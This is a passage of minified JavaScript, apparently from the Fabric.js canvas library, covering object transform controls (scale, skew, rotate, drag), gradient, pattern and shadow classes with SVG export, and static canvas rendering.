ft,Ge=me.target,Qe=Ge._getTransformedDimensions(0,Ge.skewY),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.x)-Qe.x,lt=Ge.skewX;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleX,Qe.y/Ge.scaleY)),me.originX===M&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().y;Ge.set("skewX",ft),h(Ge,"skewY","scaleY","y",We)}return xe}function J(ze,me,Ke,rt){var ft,Ge=me.target,Qe=Ge._getTransformedDimensions(Ge.skewX,0),ht=X(me,me.originX,me.originY,Ke,rt),mt=Math.abs(2*ht.y)-Qe.y,lt=Ge.skewY;mt<2?ft=0:(ft=O(Math.atan2(mt/Ge.scaleY,Qe.x/Ge.scaleX)),me.originX===M&&me.originY===w&&(ft=-ft),me.originX===D&&me.originY===p&&(ft=-ft),L(Ge)&&(ft=-ft));var xe=lt!==ft;if(xe){var We=Ge._getTransformedDimensions().x;Ge.set("skewY",ft),h(Ge,"skewX","scaleX","x",We)}return xe}function Ae(ze,me,Ke,rt,Ge){var ft,xe,We,Je,Le,$e,Qe=me.target,ht=Qe.lockScalingX,mt=Qe.lockScalingY,lt=(Ge=Ge||{}).by,Oe=se(ze,Qe),Te=le(Qe,lt,Oe),st=me.gestureScale;if(Te)return!1;if(st)xe=me.scaleX*st,We=me.scaleY*st;else{if(ft=X(me,me.originX,me.originY,Ke,rt),Le="y"!==lt?U(ft.x):1,$e="x"!==lt?U(ft.y):1,me.signX||(me.signX=Le),me.signY||(me.signY=$e),Qe.lockScalingFlip&&(me.signX!==Le||me.signY!==$e))return!1;if(Je=Qe._getTransformedDimensions(),Oe&&!lt){var xt=Math.abs(ft.x)+Math.abs(ft.y),pt=me.original,Wi=xt/(Math.abs(Je.x*pt.scaleX/Qe.scaleX)+Math.abs(Je.y*pt.scaleY/Qe.scaleY));xe=pt.scaleX*Wi,We=pt.scaleY*Wi}else xe=Math.abs(ft.x*Qe.scaleX/Je.x),We=Math.abs(ft.y*Qe.scaleY/Je.y);ve(me)&&(xe*=2,We*=2),me.signX!==Le&&"y"!==lt&&(me.originX=S[me.originX],xe*=-1,me.signX=Le),me.signY!==$e&&"x"!==lt&&(me.originY=S[me.originY],We*=-1,me.signY=$e)}var Ft=Qe.scaleX,zt=Qe.scaleY;return lt?("x"===lt&&Qe.set("scaleX",xe),"y"===lt&&Qe.set("scaleY",We)):(!ht&&Qe.set("scaleX",xe),!mt&&Qe.set("scaleY",We)),Ft!==Qe.scaleX||zt!==Qe.scaleY}y.scaleCursorStyleHandler=function ye(ze,me,Ke){var Ge=se(ze,Ke),Qe="";if(0!==me.x&&0===me.y?Qe="x":0===me.x&&0!==me.y&&(Qe="y"),le(Ke,Qe,Ge))return"not-allowed";var ht=K(Ke,me);return b[ht]+"-resize"},y.skewCursorStyleHandler=function z(ze,me,Ke){if(0!==me.x&&Ke.lockSkewingY||0!==me.y&&Ke.lockSkewingX)return"not-allowed";var Ge=K(Ke,me)%4;return _[Ge]+"-resize"},y.scaleSkewCursorStyleHandler=function l(ze,me,Ke){return ze[Ke.canvas.altActionKey]?y.skewCursorStyleHandler(ze,me,Ke):y.scaleCursorStyleHandler(ze,me,Ke)},y.rotationWithSnapping=G("rotating",P(function Ie(ze,me,Ke,rt){var Ge=me,Qe=Ge.target,ht=Qe.translateToOriginPoint(Qe.getCenterPoint(),Ge.originX,Ge.originY);if(Qe.lockRotation)return!1;var xe,mt=Math.atan2(Ge.ey-ht.y,Ge.ex-ht.x),lt=Math.atan2(rt-ht.y,Ke-ht.x),ft=O(lt-mt+Ge.theta);if(Qe.snapAngle>0){var We=Qe.snapAngle,Je=Qe.snapThreshold||We,Oe=Math.ceil(ft/We)*We,Te=Math.floor(ft/We)*We;Math.abs(ft-Te)<Je?ft=Te:Math.abs(ft-Oe)<Je&&(ft=Oe)}return ft<0&&(ft=360+ft),xe=Qe.angle!==(ft%=360),Qe.angle=ft,xe})),y.scalingEqually=G("scaling",P(function Ue(ze,me,Ke,rt){return Ae(ze,me,Ke,rt)})),y.scalingX=G("scaling",P(function Xe(ze,me,Ke,rt){return Ae(ze,me,Ke,rt,{by:"x"})})),y.scalingY=G("scaling",P(function He(ze,me,Ke,rt){return Ae(ze,me,Ke,rt,{by:"y"})})),y.scalingYOrSkewingX=function Be(ze,me,Ke,rt){return ze[me.target.canvas.altActionKey]?y.skewHandlerX(ze,me,Ke,rt):y.scalingY(ze,me,Ke,rt)},y.scalingXOrSkewingY=function qe(ze,me,Ke,rt){return ze[me.target.canvas.altActionKey]?y.skewHandlerY(ze,me,Ke,rt):y.scalingX(ze,me,Ke,rt)},y.changeWidth=G("resizing",P(function De(ze,me,Ke,rt){var Ge=me.target,Qe=X(me,me.originX,me.originY,Ke,rt),ht=Ge.strokeWidth/(Ge.strokeUniform?Ge.scaleX:1),mt=ve(me)?2:1,lt=Ge.width,ft=Math.abs(Qe.x*mt/Ge.scaleX)-ht;return Ge.set("width",Math.max(ft,0)),lt!==ft})),y.skewHandlerX=function Z(ze,me,Ke,rt){var ht,Ge=me.target,Qe=Ge.skewX,mt=me.originY;return!Ge.lockSkewingX&&(0===Qe?ht=X(me,x,x,Ke,rt).x>0?M:D:(Qe>0&&(ht=mt===p?M:D),Qe<0&&(ht=mt===p?D:M),L(Ge)&&(ht=ht===M?D:M)),me.originX=ht,G("skewing",P(R))(ze,me,Ke,rt))},y.skewHandlerY=function ue(ze,me,Ke,rt){var ht,Ge=me.target,Qe=Ge.skewY,mt=me.originX;return!Ge.lockSkewingY&&(0===Qe?ht=X(me,x,x,Ke,rt).y>0?p:w:(Qe>0&&(ht=mt===M?p:w),Qe<0&&(ht=mt===M?w:p),L(Ge)&&(ht=ht===p?w:p)),me.originY=ht,G("skewing",P(J))(ze,me,Ke,rt))},y.dragHandler=function Ve(ze,me,Ke,rt){var Ge=me.target,Qe=Ke-me.offsetX,ht=rt-me.offsetY,mt=!Ge.get("lockMovementX")&&Ge.left!==Qe,lt=!Ge.get("lockMovementY")&&Ge.top!==ht;return mt&&Ge.set("left",Qe),lt&&Ge.set("top",ht),(mt||lt)&&ee("moving",v(ze,me,Ke,rt)),mt||lt},y.scaleOrSkewActionName=function f(ze,me,Ke){var rt=ze[Ke.canvas.altActionKey];return 0===me.x?rt?"skewX":"scaleY":0===me.y?rt?"skewY":"scaleX":void 0},y.rotationStyleHandler=function A(ze,me,Ke){return Ke.lockRotation?"not-allowed":me.cursorStyle},y.fireEvent=ee,y.wrapWithFixedAnchor=P,y.wrapWithFireEvent=G,y.getLocalPoint=X,g.controlsUtils=y}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.degreesToRadians,_=g.controlsUtils;_.renderCircleControl=function y(p,D,w,x,S){x=x||{};var ye,O=this.sizeX||x.cornerSize||S.cornerSize,U=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=D,le=w;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,O>U?(ye=O,p.scale(1,U/O),le=w*O/U):U>O?(ye=U,p.scale(O/U,1),ve=D*U/O):ye=O,p.lineWidth=1,p.beginPath(),p.arc(ve,le,ye/2,0,2*Math.PI,!1),p[ee](),se&&p.stroke(),p.restore()},_.renderSquareControl=function M(p,D,w,x,S){x=x||{};var O=this.sizeX||x.cornerSize||S.cornerSize,U=this.sizeY||x.cornerSize||S.cornerSize,K=void 0!==x.transparentCorners?x.transparentCorners:S.transparentCorners,ee=K?"stroke":"fill",se=!K&&(x.cornerStrokeColor||S.cornerStrokeColor),ve=O/2,le=U/2;p.save(),p.fillStyle=x.cornerColor||S.cornerColor,p.strokeStyle=x.cornerStrokeColor||S.cornerStrokeColor,p.lineWidth=1,p.translate(D,w),p.rotate(b(S.angle)),p[ee+"Rect"](-ve,-le,O,U),se&&p.strokeRect(-ve,-le,O,U),p.restore()}}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});g.Control=function b(_){for(var y in _)this[y]=_[y]},g.Control.prototype={visible:!0,actionName:"scale",angle:0,x:0,y:0,offsetX:0,offsetY:0,sizeX:null,sizeY:null,touchSizeX:null,touchSizeY:null,cursorStyle:"crosshair",withConnection:!1,actionHandler:function(){},mouseDownHandler:function(){},mouseUpHandler:function(){},getActionHandler:function(){return this.actionHandler},getMouseDownHandler:function(){return this.mouseDownHandler},getMouseUpHandler:function(){return this.mouseUpHandler},cursorStyleHandler:function(_,y){return y.cursorStyle},getActionName:function(_,y){return y.actionName},getVisibility:function(_,y){var M=_._controlsVisibility;return M&&void 0!==M[y]?M[y]:this.visible},setVisibility:function(_){this.visible=_},positionHandler:function(_,y){return g.util.transformPoint({x:this.x*_.x+this.offsetX,y:this.y*_.y+this.offsetY},y)},calcCornerCoords:function(_,y,M,p,D){var w,x,S,O,U=D?this.touchSizeX:this.sizeX,K=D?this.touchSizeY:this.sizeY;if(U&&K&&U!==K){var ee=Math.atan2(K,U),se=Math.sqrt(U*U+K*K)/2,ve=ee-g.util.degreesToRadians(_),le=Math.PI/2-ee-g.util.degreesToRadians(_);w=se*g.util.cos(ve),x=se*g.util.sin(ve),S=se*g.util.cos(le),O=se*g.util.sin(le)}else se=.7071067812*(U&&K?U:y),ve=g.util.degreesToRadians(45-_),w=S=se*g.util.cos(ve),x=O=se*g.util.sin(ve);return{tl:{x:M-O,y:p-S},tr:{x:M+w,y:p-x},bl:{x:M-w,y:p+x},br:{x:M+O,y:p+S}}},render:function(_,y,M,p,D){"circle"===((p=p||{}).cornerStyle||D.cornerStyle)?g.controlsUtils.renderCircleControl.call(this,_,y,M,p,D):g.controlsUtils.renderSquareControl.call(this,_,y,M,p,D)}}}(we),function(){function E(M,p){var x,S,O,U,D=M.getAttribute("style"),w=M.getAttribute("offset")||0;if(w=(w=parseFloat(w)/(/%$/.test(w)?100:1))<0?0:w>1?1:w,D){var K=D.split(/\s*;\s*/);for(""===K[K.length-1]&&K.pop(),U=K.length;U--;){var ee=K[U].split(/\s*:\s*/),se=ee[0].trim(),ve=ee[1].trim();"stop-color"===se?x=ve:"stop-opacity"===se&&(O=ve)}}return x||(x=M.getAttribute("stop-color")||"rgb(0,0,0)"),O||(O=M.getAttribute("stop-opacity")),S=(x=new j.Color(x)).getAlpha(),O=isNaN(parseFloat(O))?1:parseFloat(O),O*=S*p,{offset:w,color:x.toRgb(),opacity:O}}var _=j.util.object.clone;j.Gradient=j.util.createClass({offsetX:0,offsetY:0,gradientTransform:null,gradientUnits:"pixels",type:"linear",initialize:function(M){M||(M={}),M.coords||(M.coords={});var p,D=this;Object.keys(M).forEach(function(w){D[w]=M[w]}),this.id?this.id+="_"+j.Object.__uid++:this.id=j.Object.__uid++,p={x1:M.coords.x1||0,y1:M.coords.y1||0,x2:M.coords.x2||0,y2:M.coords.y2||0},"radial"===this.type&&(p.r1=M.coords.r1||0,p.r2=M.coords.r2||0),this.coords=p,this.colorStops=M.colorStops.slice()},addColorStop:function(M){for(var p in M){var D=new j.Color(M[p]);this.colorStops.push({offset:parseFloat(p),color:D.toRgb(),opacity:D.getAlpha()})}return this},toObject:function(M){var p={type:this.type,coords:this.coords,colorStops:this.colorStops,offsetX:this.offsetX,offsetY:this.offsetY,gradientUnits:this.gradientUnits,gradientTransform:this.gradientTransform?this.gradientTransform.concat():this.gradientTransform};return j.util.populateWithProperties(this,p,M),p},toSVG:function(M,S){var w,x,O,U,D=_(this.coords,!0),K=(S=S||{},_(this.colorStops,!0)),ee=D.r1>D.r2,se=this.gradientTransform?this.gradientTransform.concat():j.iMatrix.concat(),ve=-this.offsetX,le=-this.offsetY,ye=!!S.additionalTransform,z="pixels"===this.gradientUnits?"userSpaceOnUse":"objectBoundingBox";if(K.sort(function(P,G){return P.offset-G.offset}),"objectBoundingBox"===z?(ve/=M.width,le/=M.height):(ve+=M.width/2,le+=M.height/2),"path"===M.type&&"percentage"!==this.gradientUnits&&(ve-=M.pathOffset.x,le-=M.pathOffset.y),se[4]-=ve,se[5]-=le,U='id="SVGID_'+this.id+'" gradientUnits="'+z+'"',U+=' gradientTransform="'+(ye?S.additionalTransform+" ":"")+j.util.matrixToSVG(se)+'" ',"linear"===this.type?O=["<linearGradient ",U,' x1="',D.x1,'" y1="',D.y1,'" x2="',D.x2,'" y2="',D.y2,'">\n']:"radial"===this.type&&(O=["<radialGradient ",U,' cx="',ee?D.x1:D.x2,'" cy="',ee?D.y1:D.y2,'" r="',ee?D.r1:D.r2,'" fx="',ee?D.x2:D.x1,'" fy="',ee?D.y2:D.y1,'">\n']),"radial"===this.type){if(ee)for((K=K.concat()).reverse(),w=0,x=K.length;w<x;w++)K[w].offset=1-K[w].offset;var l=Math.min(D.r1,D.r2);if(l>0){var A=l/Math.max(D.r1,D.r2);for(w=0,x=K.length;w<x;w++)K[w].offset+=A*(1-K[w].offset)}}for(w=0,x=K.length;w<x;w++){var v=K[w];O.push("<stop ",'offset="',100*v.offset+"%",'" style="stop-color:',v.color,void 0!==v.opacity?";stop-opacity: "+v.opacity:";",'"/>\n')}return O.push("linear"===this.type?"</linearGradient>\n":"</radialGradient>\n"),O.join("")},toLive:function(M){var p,w,x,D=j.util.object.clone(this.coords);if(this.type){for("linear"===this.type?p=M.createLinearGradient(D.x1,D.y1,D.x2,D.y2):"radial"===this.type&&(p=M.createRadialGradient(D.x1,D.y1,D.r1,D.x2,D.y2,D.r2)),w=0,x=this.colorStops.length;w<x;w++){var S=this.colorStops[w].color,O=this.colorStops[w].opacity,U=this.colorStops[w].offset;void 0!==O&&(S=new j.Color(S).setAlpha(O).toRgba()),p.addColorStop(U,S)}return p}}}),j.util.object.extend(j.Gradient,{fromElement:function(M,p,D,w){var x=parseFloat(D)/(/%$/.test(D)?100:1);x=x<0?0:x>1?1:x,isNaN(x)&&(x=1);var O,se,ve,z,S=M.getElementsByTagName("stop"),U="userSpaceOnUse"===M.getAttribute("gradientUnits")?"pixels":"percentage",K=M.getAttribute("gradientTransform")||"",ee=[],le=0,ye=0;for("linearGradient"===M.nodeName||"LINEARGRADIENT"===M.nodeName?(O="linear",se=function g(M){return{x1:M.getAttribute("x1")||0,y1:M.getAttribute("y1")||0,x2:M.getAttribute("x2")||"100%",y2:M.getAttribute("y2")||0}}(M)):(O="radial",se=function b(M){return{x1:M.getAttribute("fx")||M.getAttribute("cx")||"50%",y1:M.getAttribute("fy")||M.getAttribute("cy")||"50%",r1:0,x2:M.getAttribute("cx")||"50%",y2:M.getAttribute("cy")||"50%",r2:M.getAttribute("r")||"50%"}}(M)),ve=S.length;ve--;)ee.push(E(S[ve],x));return z=j.parseTransformAttribute(K),function y(M,p,D,w){var x,S;Object.keys(p).forEach(function(O){"Infinity"===(x=p[O])?S=1:"-Infinity"===x?S=0:(S=parseFloat(p[O],10),"string"==typeof x&&/^(\d+\.\d+)%|(\d+)%$/.test(x)&&(S*=.01,"pixels"===w&&(("x1"===O||"x2"===O||"r2"===O)&&(S*=D.viewBoxWidth||D.width),("y1"===O||"y2"===O)&&(S*=D.viewBoxHeight||D.height)))),p[O]=S})}(0,se,w,U),"pixels"===U&&(le=-p.left,ye=-p.top),new j.Gradient({id:M.getAttribute("id"),type:O,coords:se,colorStops:ee,gradientUnits:U,gradientTransform:z,offsetX:le,offsetY:ye})}})}(),function(){"use strict";var E=j.util.toFixed;j.Pattern=j.util.createClass({repeat:"repeat",offsetX:0,offsetY:0,crossOrigin:"",patternTransform:null,initialize:function(g,b){if(g||(g={}),this.id=j.Object.__uid++,this.setOptions(g),!g.source||g.source&&"string"!=typeof g.source)b&&b(this);else{var _=this;this.source=j.util.createImage(),j.util.loadImage(g.source,function(y,M){_.source=y,b&&b(_,M)},null,this.crossOrigin)}},toObject:function(g){var _,y,b=j.Object.NUM_FRACTION_DIGITS;return"string"==typeof this.source.src?_=this.source.src:"object"==typeof this.source&&this.source.toDataURL&&(_=this.source.toDataURL()),y={type:"pattern",source:_,repeat:this.repeat,crossOrigin:this.crossOrigin,offsetX:E(this.offsetX,b),offsetY:E(this.offsetY,b),patternTransform:this.patternTransform?this.patternTransform.concat():null},j.util.populateWithProperties(this,y,g),y},toSVG:function(g){var b="function"==typeof this.source?this.source():this.source,_=b.width/g.width,y=b.height/g.height,M=this.offsetX/g.width,p=this.offsetY/g.height,D="";return("repeat-x"===this.repeat||"no-repeat"===this.repeat)&&(y=1,p&&(y+=Math.abs(p))),("repeat-y"===this.repeat||"no-repeat"===this.repeat)&&(_=1,M&&(_+=Math.abs(M))),b.src?D=b.src:b.toDataURL&&(D=b.toDataURL()),'<pattern id="SVGID_'+this.id+'" x="'+M+'" y="'+p+'" width="'+_+'" height="'+y+'">\n<image x="0" y="0" width="'+b.width+'" height="'+b.height+'" xlink:href="'+D+'"></image>\n</pattern>\n'},setOptions:function(g){for(var b in g)this[b]=g[b]},toLive:function(g){var b=this.source;return b&&(void 0===b.src||b.complete&&0!==b.naturalWidth&&0!==b.naturalHeight)?g.createPattern(b,this.repeat):""}})}(),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=g.util.toFixed;g.Shadow?g.warn("fabric.Shadow is already defined."):(g.Shadow=g.util.createClass({color:"rgb(0,0,0)",blur:0,offsetX:0,offsetY:0,affectStroke:!1,includeDefaultValues:!0,nonScaling:!1,initialize:function(_){for(var y in"string"==typeof _&&(_=this._parseShadow(_)),_)this[y]=_[y];this.id=g.Object.__uid++},_parseShadow:function(_){var y=_.trim(),M=g.Shadow.reOffsetsAndBlur.exec(y)||[];return{color:(y.replace(g.Shadow.reOffsetsAndBlur,"")||"rgb(0,0,0)").trim(),offsetX:parseFloat(M[1],10)||0,offsetY:parseFloat(M[2],10)||0,blur:parseFloat(M[3],10)||0}},toString:function(){return[this.offsetX,this.offsetY,this.blur,this.color].join("px ")},toSVG:function(_){var y=40,M=40,p=g.Object.NUM_FRACTION_DIGITS,D=g.util.rotateVector({x:this.offsetX,y:this.offsetY},g.util.degreesToRadians(-_.angle)),x=new g.Color(this.color);return _.width&&_.height&&(y=100*b((Math.abs(D.x)+this.blur)/_.width,p)+20,M=100*b((Math.abs(D.y)+this.blur)/_.height,p)+20),_.flipX&&(D.x*=-1),_.flipY&&(D.y*=-1),'<filter id="SVGID_'+this.id+'" y="-'+M+'%" height="'+(100+2*M)+'%" x="-'+y+'%" width="'+(100+2*y)+'%" >\n\t<feGaussianBlur in="SourceAlpha" stdDeviation="'+b(this.blur?this.blur/2:0,p)+'"></feGaussianBlur>\n\t<feOffset dx="'+b(D.x,p)+'" dy="'+b(D.y,p)+'" result="oBlur" ></feOffset>\n\t<feFlood flood-color="'+x.toRgb()+'" flood-opacity="'+x.getAlpha()+'"/>\n\t<feComposite in2="oBlur" operator="in" />\n\t<feMerge>\n\t\t<feMergeNode></feMergeNode>\n\t\t<feMergeNode in="SourceGraphic"></feMergeNode>\n\t</feMerge>\n</filter>\n'},toObject:function(){if(this.includeDefaultValues)return{color:this.color,blur:this.blur,offsetX:this.offsetX,offsetY:this.offsetY,affectStroke:this.affectStroke,nonScaling:this.nonScaling};var _={},y=g.Shadow.prototype;return["color","blur","offsetX","offsetY","affectStroke","nonScaling"].forEach(function(M){this[M]!==y[M]&&(_[M]=this[M])},this),_}}),g.Shadow.reOffsetsAndBlur=/(?:\s|^)(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(-?\d+(?:\.\d*)?(?:px)?(?:\s?|$))?(\d+(?:\.\d*)?(?:px)?)?(?:\s?|$)(?:$|\s)/)}(we),function(){"use strict";if(j.StaticCanvas)j.warn("fabric.StaticCanvas is already defined.");else{var E=j.util.object.extend,g=j.util.getElementOffset,b=j.util.removeFromArray,_=j.util.toFixed,y=j.util.transformPoint,M=j.util.invertTransform,p=j.util.getNodeCanvas,D=j.util.createCanvasElement,w=new Error("Could not initialize `canvas` element");j.StaticCanvas=j.util.createClass(j.CommonMethods,{initialize:function(x,S){S||(S={}),this.renderAndResetBound=this.renderAndReset.bind(this),this.requestRenderAllBound=this.requestRenderAll.bind(this),this._initStatic(x,S)},backgroundColor:"",backgroundImage:null,overlayColor:"",overlayImage:null,includeDefaultValues:!0,stateful:!1,renderOnAddRemove:!0,controlsAboveOverlay:!1,allowTouchScrolling:!1,imageSmoothingEnabled:!0,viewportTransform:j.iMatrix.concat(),backgroundVpt:!0,overlayVpt:!0,enableRetinaScaling:!0,vptCoords:{},skipOffscreen:!0,clipPath:void 0,_initStatic:function(x,S){var O=this.requestRenderAllBound;this._objects=[],this._createLowerCanvas(x),this._initOptions(S),this.interactive||this._initRetinaScaling(),S.overlayImage&&this.setOverlayImage(S.overlayImage,O),S.backgroundImage&&this.setBackgroundImage(S.backgroundImage,O),S.backgroundColor&&this.setBackgroundColor(S.backgroundColor,O),S.overlayColor&&this.setOverlayColor(S.overlayColor,O),this.calcOffset()},_isRetinaScaling:function(){return j.devicePixelRatio>1&&this.enableRetinaScaling},getRetinaScaling:function(){return this._isRetinaScaling()?Math.max(1,j.devicePixelRatio):1},_initRetinaScaling:function(){if(this._isRetinaScaling()){var x=j.devicePixelRatio;this.__initRetinaScaling(x,this.lowerCanvasEl,this.contextContainer),this.upperCanvasEl&&this.__initRetinaScaling(x,this.upperCanvasEl,this.contextTop)}},__initRetinaScaling:function(x,S,O){S.setAttribute("width",this.width*x),S.setAttribute("height",this.height*x),O.scale(x,x)},calcOffset:function(){return this._offset=g(this.lowerCanvasEl),this},setOverlayImage:function(x,S,O){return this.__setBgOverlayImage("overlayImage",x,S,O)},setBackgroundImage:function(x,S,O){return this.__setBgOverlayImage("backgroundImage",x,S,O)},setOverlayColor:function(x,S){return this.__setBgOverlayColor("overlayColor",x,S)},setBackgroundColor:function(x,S){return this.__setBgOverlayColor("backgroundColor",x,S)},__setBgOverlayImage:function(x,S,O,U){return"string"==typeof S?j.util.loadImage(S,function(K,ee){if(K){var se=new j.Image(K,U);this[x]=se,se.canvas=this}O&&O(K,ee)},this,U&&U.crossOrigin):(U&&S.setOptions(U),this[x]=S,S&&(S.canvas=this),O&&O(S,!1)),this},__setBgOverlayColor:function(x,S,O){return this[x]=S,this._initGradient(S,x),this._initPattern(S,x,O),this},_createCanvasElement:function(){var x=D();if(!x||(x.style||(x.style={}),void 0===x.getContext))throw w;return x},_initOptions:function(x){var S=this.lowerCanvasEl;this._setOptions(x),this.width=this.width||parseInt(S.width,10)||0,this.height=this.height||parseInt(S.height,10)||0,this.lowerCanvasEl.style&&(S.width=this.width,S.height=this.height,S.style.width=this.width+"px",S.style.height=this.height+"px",this.viewportTransform=this.viewportTransform.slice())},_createLowerCanvas:function(x){this.lowerCanvasEl=x&&x.getContext?x:j.util.getById(x)||this._createCanvasElement(),j.util.addClass(this.lowerCanvasEl,"lower-canvas"),this._originalCanvasStyle=this.lowerCanvasEl.style,this.interactive&&this._applyCanvasStyle(this.lowerCanvasEl),this.contextContainer=this.lowerCanvasEl.getContext("2d")},getWidth:function(){return this.width},getHeight:function(){return this.height},setWidth:function(x,S){return this.setDimensions({width:x},S)},setHeight:function(x,S){return this.setDimensions({height:x},S)},setDimensions:function(x,S){var O;for(var U in S=S||{},x)O=x[U],S.cssOnly||(this._setBackstoreDimension(U,x[U]),O+="px",this.hasLostContext=!0),S.backstoreOnly||this._setCssDimension(U,O);return this._isCurrentlyDrawing&&this.freeDrawingBrush&&this.freeDrawingBrush._setBrushStyles(this.contextTop),this._initRetinaScaling(),this.calcOffset(),S.cssOnly||this.requestRenderAll(),this},_setBackstoreDimension:function(x,S){return this.lowerCanvasEl[x]=S,this.upperCanvasEl&&(this.upperCanvasEl[x]=S),this.cacheCanvasEl&&(this.cacheCanvasEl[x]=S),this[x]=S,this},_setCssDimension:function(x,S){return this.lowerCanvasEl.style[x]=S,this.upperCanvasEl&&(this.upperCanvasEl.style[x]=S),this.wrapperEl&&(this.wrapperEl.style[x]=S),this},getZoom:function(){return this.viewportTransform[0]},setViewportTransform:function(x){var K,ee,se,S=this._activeObject,O=this.backgroundImage,U=this.overlayImage;for(this.viewportTransform=x,ee=0,se=this._objects.length;ee<se;ee++)(K=this._objects[ee]).group||K.setCoords(!0);return S&&S.setCoords(),O&&O.setCoords(!0),U&&U.setCoords(!0),this.calcViewportBoundaries(),this.renderOnAddRemove&&this.requestRenderAll(),this},zoomToPoint:function(x,S){var O=x,U=this.viewportTransform.slice(0);x=y(x,M(this.viewportTransform)),U[0]=S,U[3]=S;var K=y(x,U);return U[4]+=O.x-K.x,U[5]+=O.y-K.y,this.setViewportTransform(U)},setZoom:function(x){return this.zoomToPoint(new j.Point(0,0),x),this},absolutePan:function(x){var S=this.viewportTransform.slice(0);return S[4]=-x.x,S[5]=-x.y,this.setViewportTransform(S)},relativePan:function(x){return this.absolutePan(new j.Point(-x.x-this.viewportTransform[4],-x.y-this.viewportTransform[5]))},getElement:function(){return this.lowerCanvasEl},_onObjectAdded:function(x){this.stateful&&x.setupState(),x._set("canvas",this),x.setCoords(),this.fire("object:added",{target:x}),x.fire("added")},_onObjectRemoved:function(x){this.fire("object:removed",{target:x}),x.fire("removed"),delete x.canvas},clearContext:function(x){return x.clearRect(0,0,this.width,this.height),this},getContext:function(){return this.contextContainer},clear:function(){return this.remove.apply(this,this.getObjects()),this.backgroundImage=null,this.overlayImage=null,this.backgroundColor="",this.overlayColor="",this._hasITextHandlers&&(this.off("mouse:up",this._mouseUpITextHandler),this._iTextInstances=null,this._hasITextHandlers=!1),this.clearContext(this.contextContainer),this.fire("canvas:cleared"),this.renderOnAddRemove&&this.requestRenderAll(),this},renderAll:function(){return this.renderCanvas(this.contextContainer,this._objects),this},renderAndReset:function(){this.isRendering=0,this.renderAll()},requestRenderAll:function(){return this.isRendering||(this.isRendering=j.util.requestAnimFrame(this.renderAndResetBound)),this},calcViewportBoundaries:function(){var x={},S=this.width,O=this.height,U=M(this.viewportTransform);return x.tl=y({x:0,y:0},U),x.br=y({x:S,y:O},U),x.tr=new j.Point(x.br.x,x.tl.y),x.bl=new j.Point(x.tl.x,x.br.y),this.vptCoords=x,x},cancelRequestedRender:function(){this.isRendering&&(j.util.cancelAnimFrame(this.isRendering),this.isRendering=0)},renderCanvas:function(x,S){var O=this.viewportTransform,U=this.clipPath;this.cancelRequestedRender(),this.calcViewportBoundaries(),this.clearContext(x),j.util.setImageSmoothing(x,this.imageSmoothingEnabled),this.fire("before:render",{ctx:x}),this._renderBackground(x),x.save(),x.transform(O[0],O[1],O[2],O[3],O[4],O[5]),this._renderObjects(x,S),x.restore(),!this.controlsAboveOverlay&&this.interactive&&this.drawControls(x),U&&(U.canvas=this,U.shouldCache(),U._transformDone=!0,U.renderCache({forClipping:!0}),this.drawClipPathOnCanvas(x)),this._renderOverlay(x),this.controlsAboveOverlay&&this.interactive&&this.drawControls(x),this.fire("after:render",{ctx:x})},drawClipPathOnCanvas:function(x){var S=this.viewportTransform,O=this.clipPath;x.save(),x.transform(S[0],S[1],S[2],S[3],S[4],S[5]),x.globalCompositeOperation="destination-in",O.transform(x),x.scale(1/O.zoomX,1/O.zoomY),x.drawImage(O._cacheCanvas,-O.cacheTranslationX,-O.cacheTranslationY),x.restore()},_renderObjects:function(x,S){var O,U;for(O=0,U=S.length;O<U;++O)S[O]&&S[O].render(x)},_renderBackgroundOrOverlay:function(x,S){var O=this[S+"Color"],U=this[S+"Image"],K=this.viewportTransform,ee=this[S+"Vpt"];if(O||U){if(O){x.save(),x.beginPath(),x.moveTo(0,0),x.lineTo(this.width,0),x.lineTo(this.width,this.height),x.lineTo(0,this.height),x.closePath(),x.fillStyle=O.toLive?O.toLive(x,this):O,ee&&x.transform(K[0],K[1],K[2],K[3],K[4],K[5]),x.transform(1,0,0,1,O.offsetX||0,O.offsetY||0);var se=O.gradientTransform||O.patternTransform;se&&x.transform(se[0],se[1],se[2],se[3],se[4],se[5]),x.fill(),x.restore()}U&&(x.save(),ee&&x.transform(K[0],K[1],K[2],K[3],K[4],K[5]),U.render(x),x.restore())}},_renderBackground:function(x){this._renderBackgroundOrOverlay(x,"background")},_renderOverlay:function(x){this._renderBackgroundOrOverlay(x,"overlay")},getCenter:function(){return{top:this.height/2,left:this.width/2}},getCenterPoint:function(){return new j.Point(this.width/2,this.height/2)},centerObjectH:function(x){return this._centerObject(x,new j.Point(this.getCenterPoint().x,x.getCenterPoint().y))},centerObjectV:function(x){return this._centerObject(x,new j.Point(x.getCenterPoint().x,this.getCenterPoint().y))},centerObject:function(x){var S=this.getCenterPoint();return this._centerObject(x,S)},viewportCenterObject:function(x){var S=this.getVpCenter();return this._centerObject(x,S)},viewportCenterObjectH:function(x){var S=this.getVpCenter();return this._centerObject(x,new j.Point(S.x,x.getCenterPoint().y)),this},viewportCenterObjectV:function(x){var S=this.getVpCenter();return this._centerObject(x,new j.Point(x.getCenterPoint().x,S.y))},getVpCenter:function(){var x=this.getCenterPoint(),S=M(this.viewportTransform);return y(x,S)},_centerObject:function(x,S){return x.setPositionByOrigin(S,"center","center"),x.setCoords(),this.renderOnAddRemove&&this.requestRenderAll(),this},toDatalessJSON:function(x){return this.toDatalessObject(x)},toObject:function(x){return this._toObjectMethod("toObject",x)},toDatalessObject:function(x){return this._toObjectMethod("toDatalessObject",x)},_toObjectMethod:function(x,S){var O=this.clipPath,U={version:j.version,objects:this._toObjects(x,S)};return 